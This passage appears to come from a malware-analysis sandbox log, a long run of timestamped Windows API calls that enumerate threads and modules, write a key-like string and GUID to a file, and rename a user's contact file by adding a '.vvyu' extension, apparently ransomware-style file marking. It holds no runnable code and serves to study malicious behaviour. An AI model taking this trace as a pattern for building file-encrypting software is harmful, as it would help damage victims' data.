RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.100] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.100] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.102] GetTickCount () returned 0xbb9f [0187.102] GetCurrentThreadId () returned 0x5d8 [0187.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.102] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.104] GetTickCount () returned 0xbbaf [0187.104] GetCurrentThreadId () returned 0x5d8 [0187.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.104] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.105] GetTickCount () returned 0xbbaf [0187.105] GetCurrentThreadId () returned 0x5d8 [0187.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.106] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.107] GetTickCount () returned 0xbbaf [0187.107] GetCurrentThreadId () returned 0x5d8 [0187.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.107] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.108] GetTickCount () returned 0xbbaf [0187.108] GetCurrentThreadId () returned 0x5d8 [0187.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.109] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.109] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.110] GetTickCount () returned 0xbbaf [0187.110] GetCurrentThreadId () returned 0x5d8 [0187.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.110] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.112] GetTickCount () returned 0xbbaf [0187.112] GetCurrentThreadId () returned 0x5d8 [0187.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.112] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.113] GetTickCount () returned 0xbbaf [0187.113] GetCurrentThreadId () returned 0x5d8 [0187.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.114] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.115] GetTickCount () returned 0xbbaf [0187.115] GetCurrentThreadId () returned 0x5d8 [0187.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.116] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.117] GetTickCount () returned 0xbbaf [0187.117] GetCurrentThreadId () returned 0x5d8 [0187.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.117] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.119] GetTickCount () returned 0xbbbf [0187.119] GetCurrentThreadId () returned 0x5d8 [0187.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.120] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.121] GetTickCount () returned 0xbbbf [0187.121] GetCurrentThreadId () returned 0x5d8 [0187.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.121] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.123] GetTickCount () returned 0xbbbf [0187.123] GetCurrentThreadId () returned 0x5d8 [0187.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.123] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.124] GetTickCount () returned 0xbbbf [0187.124] GetCurrentThreadId () returned 0x5d8 [0187.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.125] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.126] GetTickCount () returned 0xbbbf [0187.126] GetCurrentThreadId () returned 0x5d8 [0187.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.126] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.128] GetTickCount () returned 0xbbbf [0187.128] GetCurrentThreadId () returned 0x5d8 [0187.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.128] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.129] GetTickCount () returned 0xbbbf [0187.129] GetCurrentThreadId () returned 0x5d8 [0187.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.140] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.141] GetTickCount () returned 0xbbce [0187.141] GetCurrentThreadId () returned 0x5d8 [0187.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.142] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.143] GetTickCount () returned 0xbbce [0187.143] GetCurrentThreadId () returned 0x5d8 [0187.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.144] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.145] GetTickCount () returned 0xbbce [0187.145] GetCurrentThreadId () returned 0x5d8 [0187.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.146] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.147] GetTickCount () returned 0xbbce [0187.147] GetCurrentThreadId () returned 0x5d8 [0187.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.148] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.149] GetTickCount () returned 0xbbde [0187.149] GetCurrentThreadId () returned 0x5d8 [0187.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.150] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.151] GetTickCount () returned 0xbbde [0187.151] GetCurrentThreadId () returned 0x5d8 [0187.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.152] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.153] GetTickCount () returned 0xbbde [0187.153] GetCurrentThreadId () returned 0x5d8 [0187.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.154] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.155] GetTickCount () returned 0xbbde [0187.155] GetCurrentThreadId () returned 0x5d8 [0187.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.156] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.157] GetTickCount () returned 0xbbde [0187.157] GetCurrentThreadId () returned 0x5d8 [0187.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.158] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.159] GetTickCount () returned 0xbbde [0187.159] GetCurrentThreadId () returned 0x5d8 [0187.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.160] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.162] GetTickCount () returned 0xbbde [0187.162] GetCurrentThreadId () returned 0x5d8 [0187.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.162] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.164] GetTickCount () returned 0xbbde [0187.164] GetCurrentThreadId () returned 0x5d8 [0187.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.164] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.167] GetTickCount () returned 0xbbed [0187.168] GetCurrentThreadId () returned 0x5d8 [0187.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.168] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.170] GetTickCount () returned 0xbbed [0187.170] GetCurrentThreadId () returned 0x5d8 [0187.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.170] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.171] GetTickCount () returned 0xbbed [0187.172] GetCurrentThreadId () returned 0x5d8 [0187.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.172] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.173] GetTickCount () returned 0xbbed [0187.173] GetCurrentThreadId () returned 0x5d8 [0187.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.174] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.175] GetTickCount () returned 0xbbed [0187.175] GetCurrentThreadId () returned 0x5d8 [0187.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.176] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.178] GetTickCount () returned 0xbbed [0187.178] GetCurrentThreadId () returned 0x5d8 [0187.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.178] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.182] GetTickCount () returned 0xbbfd [0187.182] GetCurrentThreadId () returned 0x5d8 [0187.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.183] Thread32Next (hSnapshot=0x594, lpte=0x2f9f434) returned 1 [0187.184] Module32First (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.185] GetCurrentThreadId () returned 0x5d8 [0187.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0187.186] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.187] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.187] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.188] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.189] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.190] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.191] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.191] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.192] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.193] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.194] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.195] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.196] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.196] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.197] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.198] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.199] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.200] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.201] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.202] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.202] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.203] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.204] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.205] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.205] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.206] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.207] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.208] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.209] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.209] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.211] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.212] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.213] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.214] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.216] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.217] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.218] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.219] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.221] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.222] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.223] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.224] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.226] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.227] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.228] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.229] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.230] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.232] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.233] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.234] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.235] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.236] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.237] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.239] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.240] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.241] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.242] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.243] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.245] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.246] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.247] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.248] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.249] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.251] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.252] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.253] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.254] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.255] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.256] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.258] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.269] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 1 [0187.271] Module32Next (hSnapshot=0x594, lpme=0x2f9f034) returned 0 [0187.272] CloseHandle (hObject=0x594) returned 1 [0187.272] FreeLibrary (hLibModule=0x76600000) returned 1 [0187.272] QueryPerformanceCounter (in: lpPerformanceCount=0x2f9efa4 | out: lpPerformanceCount=0x2f9efa4*=2067356600728) returned 1 [0187.273] GetCurrentThreadId () returned 0x5d8 [0187.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.274] GlobalMemoryStatus (in: lpBuffer=0x2f9f414 | out: lpBuffer=0x2f9f414) [0187.274] GetCurrentThreadId () returned 0x5d8 [0187.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0187.288] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10b1e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.289] WriteFile (in: hFile=0x584, lpBuffer=0x2f5b18*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2f5b18*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0187.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0187.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af5168 [0187.301] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af5168, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af5598 [0187.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0187.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0187.325] WriteFile (in: hFile=0x584, lpBuffer=0x2af5598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af5598*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0187.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5598 | out: hHeap=0x2c0000) returned 1 [0187.326] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.326] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0187.326] CloseHandle (hObject=0x584) returned 1 [0187.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0187.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af5168 [0187.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0187.337] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.vvyu" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact.vvyu")) returned 1 [0187.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0187.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.342] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0187.363] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0187.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.376] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini") returned=".ini" [0187.389] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0187.390] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0187.390] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0187.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0187.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c60 | out: hHeap=0x2c0000) returned 1 [0187.402] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0187.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0187.402] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0187.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0187.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0187.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05c18 | out: hHeap=0x2c0000) returned 1 [0187.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0187.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0187.404] HeapFree (in: 